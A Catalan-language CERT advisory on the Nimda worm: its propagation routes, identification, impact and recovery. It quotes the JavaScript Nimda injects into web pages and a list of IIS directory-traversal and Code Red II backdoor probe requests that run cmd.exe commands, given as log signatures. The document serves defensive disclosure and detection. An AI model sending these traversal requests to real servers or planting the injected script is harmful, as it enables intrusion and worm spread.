El CERT ha emès un avís per tal d'informar sobre un nou cuc, amb una gran capacitat de propagació. La principal novetat és la utilització de diversos mecanismes per a la distribució del cuc: - De client a client per correu electrònic.
- De client a client a traves dels recursos compartits de la xarxa.
- Des d'un servidor web al visitant a l'accedir a una pàgina d'un servidor infectat.
- Des d'un client a un servidor web, aprofitant-se de la vulnerabilitat “Microsoft IIS 4.0/5.0 Directory Traversal”.
- Des d'un client a un servidor web, comprovant l'existència de les portes secretes deixades pel cuc “Code Red II” (veure l'anàlisi d'aquest cuc).
Les anàlisis inicials semblen indicar que el cuc no realitza cap funció malèvola més enllà de la modificació del contingut de les pàgines web per tal de facilitar la seva propagació. Hi han informes que permeten considerar aquest cuc com una eina per a la realització d'atacs de denegació de servei, pel gran volum de ample de banda utilitzat en les funcions de cerca i per la distribució de missatges. Descripció El cuc Nimda pot afectar tant a estacions de treball (clients) que facin servir els sistemes operatius de Microsoft (Windows 95, 98, ME, NT i 2000) com als servidors que fan servidor Windows NT i Windows 2000. Propagació per correu electrònic Aquest cuc es distribueix a traves d'un missatge de correu electrònic que arriba com a tipus MIME “multipart/alternative”. El missatge conté dues parts: la primera secció està definida com a tipus MIME “text/html”, però no conté pas text de forma que el missatge surt com a buit. La segona secció del missatge està definida com del tipus MIME “audio/x-wav”, però conté en realitat un fitxer associat codificat en base64 anomenat “README.EXE”, Aquest fitxer és un programa executable. Donada l'existència de la vulnerabilitat descrita prèviament (veure l'avís CA-2001-06, execució automàtica dels tipus MIME associats a missatges), qualsevol programa de correu que utilitzi l'Internet Explorer 5.5 SP1 (o qualsevol versió anterior, excepte la 5.01 SP2) per a la visualització dels missatges HTML de forma automàtica executarà el fitxer associat i, com a conseqüència infectarà la màquina. És a dir, en les configuracions vulnerables, el fitxer associat al missatge provocarà la infecció de l'ordinador només amb l'obertura (o previsualització) del missatge. Com el fitxer associat és un executable, la seva execució directa també provocarà la infecció de l'ordinador. El missatge que distribueix el cuc Nimda té les següents característiques: - El text utilitzat al tema (Subject) del missatge sembla ser variable, encara que els vistos fins ara tenen una longitud de 80 caràcters.
- Pel que sembla, hi han diferències menors als fitxers associats al missatge . Això fa que al realitzar la comparació directa del fitxer associat o del missatge no sempre coincideixin. Ara bé, la longitud del fitxer sempre es 57.344 bytes.
El cuc conté codi per tal de provocar el reenviament de missatges infectats cada 10 dies. L'obtenció de les adreces de correu on enviar els missatges infectats es fa a partir de: - Els fitxers .HTM i .HTML existents a la carpeta de memòria cau de l'usuari.
- El contingut dels missatges de correu que rep l'usuari a traves del servei MAPI.
Aquests fitxers són analitzats i s'extreu qualsevol cosa que pot semblar una adreça de correu i envia una còpia del missatge amb el fitxer README.EXE associat. Nimda enregistra la data de l'últim enviament efectuat al registre de Windows i cada 10 dies repetirà el procés d'obtenció d'adreces de correu i d'enviament dels missatges. Per altra banda, la màquina infectada iniciarà una cerca per trobar servidors IIS vulnerables. Intenta detectar l'existència de les portes ocultes deixades pels cucs Code Red II i sadmind/IIS. També intenta explotar directament la vulnerabilitat anomenada IIS Directory Traversal. La màquina infectada envia una còpia de Nimda a tots els servidors que localitza i que són vulnerables. Un cop arriba a la màquina que fa de servidor, el cuc analitza tots els directoris del sistema (incloent-hi aquells directoris de la xarxa que són accessibles a la màquina) i enregistra una còpia d'ell mateix a un fitxer anomenat README.EML. Si troba un directori que conté pàgines web (fitxers HTM, HTML i ASP) afegeix el següent codi JavaScript: <script language=”JavaScript”>
window.open(“reader.eml”, null, “resizable=no,top=6000, left=6000”></script>
Aquesta modificació de les pàgines web permet la distribució del cuc a tots els visitants que accedeixin al contingut del servidor amb una navegador o bé de l'explorador de Windows. Propagació pel navegador Com a part del procés d'infecció, el cuc Nimda modifica tot el contingut del servidor web. D'aquesta forma, qualsevol usuari que consulti el contingut web del sistema, ja sigui a traves del sistema de fitxers o d'un servidor web, pot ser que descarregui una còpia del cuc. Alguns navegadors poden executar automàticament el fitxer acabat de baixar, provocant la infecció del sistema. Propagació pel sistema de fitxers El cuc Nimda crea múltiples còpies d'ell mateix (amb el nom README.EML) dins de tots els directoris amb permís d'escriptura que troba, incloent-hi els directoris local i els remots. Identificació L'activitat de cerca de sistemes vulnerables provoca l'aparició de les següents entrades dins el registre d'activitat de qualsevol servidor web que escolti al port 80/tcp GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/
cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c.../..%255c../winnt/system32/
cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../
..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Les quatre primeres entrades indiquen els intents de connexió a les portes ocultes deixades per Code Red II, mentre que les altres entrades corresponen a intents d'utilització de la vulnerabilitat Directory Traversal. Impacte Els atacants poden executar ordres del sistema dins els context de seguretat LocalSystem. Només es veuen afectats els servidors IIS que no estan convenientment actualitzats. En el cas de compromís d'un client, el cuc s'executa amb els mateixos privilegis de l'usuari actualment actiu. L'activitat del cuc pot provocar el consum d'una porció significativa de l'ample de banda. Solucions Recomanacions pels administradors de màquines IIS Per tal de determinar si el sistema ha estat compromès, determinar la presència dels fitxers root.exe (indica la presència del cuc Code Red II o de sadmind/IIS, que fan el sistema vulnerable al cuc Nimda) i admin.dll (que indica la presència del cuc Nimda). Determinar també la presència de fitxers .EML als directoris amb contingut web. La única forma vàlida de recuperar un sistema compromès passa pel formateig de totes les unitats de disc i la reinstal·lació dels programes a partir de còpies de confiança (com per exemple, els CD originals del producte). Recomanacions per a usuaris finals Es recomana la instal·lació de l'actualització del Microsoft Explorer 5.01 i 5.5, disponible a: Igualment es important actualitzar el fitxer de signatures del programa antivíric instal·lat a l'ordinador. | 
